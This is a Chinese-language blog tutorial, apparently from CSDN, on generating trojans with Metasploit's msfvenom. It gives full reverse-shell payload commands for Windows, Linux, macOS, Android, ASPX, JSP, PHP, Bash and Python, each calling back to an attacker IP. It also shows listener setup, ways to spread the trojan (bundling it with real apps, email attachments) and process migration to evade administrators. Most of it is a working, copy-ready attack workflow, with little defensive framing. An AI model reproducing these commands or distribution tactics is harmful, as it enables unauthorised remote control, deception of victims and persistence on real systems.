首页 > 编程语言 >Metasploit木马生成教程,零基础入门到精通,收藏这篇就够了

Metasploit木马生成教程,零基础入门到精通,收藏这篇就够了

时间:2024-12-06 16:29:54浏览次数:5  
标签:Metasploit 教程 shell 192.168 49.139 木马 msfvenom payload

0****1

概述

上次我们聊到了通过目标系统漏洞来获取目标的权限,其实我们除了可以通过目标系统的漏洞来获取 meterpreter 之外,还可以直接通过木马获取。

msfvenom 就是 MSF 中用来生成后门木马的模块,在目标机器上执行后门木马,然后在本地配置监听目标即可上线,攻击机即可获得 meterpreter。

msfvenom 是 msfpayload 和 msfencode 的组合,将这两个工具集成在一个框架实例中。

msfvenom 主要生成可执行程序、DLL 文件、Webshell 和 Shellcode 等。

0****2

相关参数

 -l <type>:列出相关类型(如 payloads, encoders, nops, platforms, archs, encrypt, formats, all)的所有模块信息。  -p <payload>:设置使用的 payload。  -p <payload> --list-options:列出指定的 payload 的相关参数。  -f <format>:设置输出格式。  --encoder <encoder>:设置所使用的编码器。  --service-name <value>:设置生成的二进制服务程序的名称。  --sec-name <value>:设置当生成大的 windows 二进制程序文件时使用的节(section)名。默认是四个随机字母组成的字符串。  --smallest:使用所有的编码器生成尽可能小的 payload。  --encrypt <value>:设置编码或加密 shellcode 的方式。  --encrypt-key <value>:设置加密密钥。  --encrypt-iv <value>:设置加密的初始向量 IV。  -a <arch>:设置 payload 使用的软件架构。  --platform <platform>:设置 payload 使用的平台。  -o <path>:将 payload 保存到指定的文件路径。  -b <list>:设置 payload 中需要避免的字符。  -n <length>:在 payload 中预置指定长度的滑板指令。  -s, --space <length>:设置生成的 payload 的最大文件大小。  --encoder-space <length>:设置编码后的 payload 的最大文件大小。  -i <count>:指定编码的次数。  -c <path> :指定包含额外的 win32 shellcode 的文件路径。  -x <path>:使用一个可执行文件当作模板。  -k:保留模板文件的功能,将 payload 作为线程注入。  -v <value>:为某些特定的输出格式指定变量名。  -t <second>:设置从 STDIN 读取 payload 的最长等待时间(单位为秒)。默认为 30 秒。设置为 0 表示禁用时间限制。  -h:输出帮助页面。

0****3

木马生成方法(MSF6)

这里针对不同的目标我们有不同的命令,但仔细看你会发现,命令整体结构其实差不多,区别主要在于目标架构不同。

Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f exe > shell.exe``   ``msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f c

Linux
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f elf > shell.elf

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f macho > shell.macho

Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.apk``   ``msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 R > shell.apk

ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT= 8888 -f aspx -o shell.aspx

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.jsp

PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.php

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.139 LPORT=8888 -f raw > shell.sh

Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.py

0****4

举例—木马攻击

MSF 创建监听

首先进入 msf。

msfconsole

然后依次输入以下命令即可。

use exploit/multi/handler``   ``set lhost 192.168.49.139  # 攻击机的IP``   ``set lport 8888    # 攻击机监听的端口``   ``set payload windows/x64/meterpreter/reverse_tcp``   ``run

生成木马

重新开一个窗口,执行以下命令,这里需要注意的是 IP、PORT 要保持和上面创建监听时的值一致,payload 也需要一致。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f exe > shell.exe

然后将木马上传到目标系统

传播木马的常见方法

  • 直接通过漏洞上传到目标服务器。

  • 把木马和一个正常应用程序捆绑,发布到网上诱导用户下载。

  • 社工,通过邮件附件进行传播。

这里我们简单一点,直接把木马拖到目标系统上,中间的木马传播环节我们就省略了,主要看一下木马上线的效果。

执行即可上线

在目标系统上双击执行木马,然后到 msf 中查看目标是否上线。

进程迁移

最后做一下进程迁移主要是为了防止管理员发现木马进程并结束木马进程,所以我们可以通过迁移隐藏一下,增加应急的难度。

而且注入之后原来的木马程序就算被删除了也没关系,只要进程还在,我们的权限就一直在,用起来爽歪歪!

查看木马在目标系统上运行的进程。

getpid

查看目标系统上目前存活的进程,这里会有很多进程,我只截取了前面一部分。

ps

选一个稳定的进程,迁移到这个进程中。

migrate 4084

最后你会发现木马原本的进程 3432 就不存在了。

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,点击下方蓝色字 即可免费领取↓↓↓

**读者福利 |**

标签:Metasploit,教程,shell,192.168,49.139,木马,msfvenom,payload
From: https://blog.csdn.net/web22050702/article/details/144294309

相关文章

  • 数据库管理与开发基础教程 (三)
    用户管理用户管理基本用户用户也叫做方案,是一组逻辑对象的所有者,采用数据库验证和操作系统验证。空间分配,表空间中,必须要为一个用户指派空间配额,用于存储数据库对象。初始化管理用户SYS数据库中最高权限,拥有所有权限,拥有数据字典。-默认口令change_on_installSYSTEM具有......
  • LM317&LM337可调电源制作教程:一学就会,简单实用!
    目录......
  • 【AI绘画stable diffusion教程】对普通人来说,Stable diffusion 和 Midjourney 怎么选?
    前言这个问题我觉得挺好,因为虽然StableDiffusion(SD)和Midjourney(MJ)这2个AI绘画工具的名字已经深入广大AI爱好者的内心了,但对于普通人(包括刚接触到AI绘画的童鞋)来说,看到这2个名字仍然还是会感觉到陌生。那么,今天我就来给新手用户来讲讲这2个AI绘画工具的区别,我们应该如何选......
  • 【comfyui教程:】ComfyUI | 最简单Flux模型入门教程,让你的图片告别AI味
    前言最近有一款名为FLUX的AI绘画模型被誉为“小红书美女爆款风格制造机”,它产出的图片具有超强的的真实感,在AI圈超级火!像下面这几张美女图片,就是用的Flux模型FLUX模型产出的图片,具有超强的真实感。在小红书和视频号、抖音等社交媒体,热度极高。自从有了FLUX模型,小红......
  • Redis教程【一】
    Redis由入门到精通引言Redis是一种基于键值对(key-value)的高性能的NoSql数据库,它提供了各种数据结构存储,具有高性能的读写功能,是目前企业中应用极其广泛的一种数据库。官网:https://redis.io1.NoSql数据库简介1.1技术发展web1.0时代,数据访问量很有限,用高性能的单点服......
  • 快速入门:免费通配符SSL证书的简易申请设置教程
    通配符SSL证书(也叫泛域名SSL证书)非常适合那些有很多子域名的网站,因为它能让证书管理和安装变得更简单。JoySSL是一家提供SSL证书服务的平台,现在推出了可以免费使用的通配符SSL证书。下面是一些关于这个免费通配符SSL证书的详细信息和申请步骤:申请步骤访问官网并注册账号打......
  • 运营级在线客服/唯一客服/带非常完整的搭建教程/带评价管理
    智能化在线客服系统也是其中一个必备功能。其智能化主要体现在细节中,在保持客服人员工作正常进行的情况下,让效率变高。智能化在线客服系统采取“轮询”的工单分配方式,让合适的客服人员处理合适的问题;提供“视图”功能,让客服人员专注于重要工单;强大的“搜索”功能,迅速锁定目标客户......
  • Unity最新详细下载安装教程【附安装包】
    目录初识:Unity一、下载:Unity二、安装:Unity1.下载安装包之后右键点击【解压到当前文件夹】2.双击安装包启动安装3.点击【我同意】4.点击【浏览】5.在D盘新建【Unity】文件夹,勾选之后点击【确定】6.确认安装目录后,点击【安装】7.等待安装完成8.勾选【运行UnityHub】,......
  • SpringCloudStream极简教程
    简介SpringCloudStream是一个轻量级消息驱动微服务框架,旨在简化与消息中间件(如Kafka、RabbitMQ等)的集成,支持消息的发布和订阅模式。它提供了一种基于Spring编程模型的方式(即自动依赖注入和强调通过注解来完成功能的封装),使得构建可扩展和灵活的消息驱动应用变得更加简单。......
  • 渗透测试-Kioptix Level 1靶机getshell及提权教程
    声明!学习视频来自B站up主泷羽sec有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!工具地址:通过网盘分享的文件:OSCP靶场链接:https:/......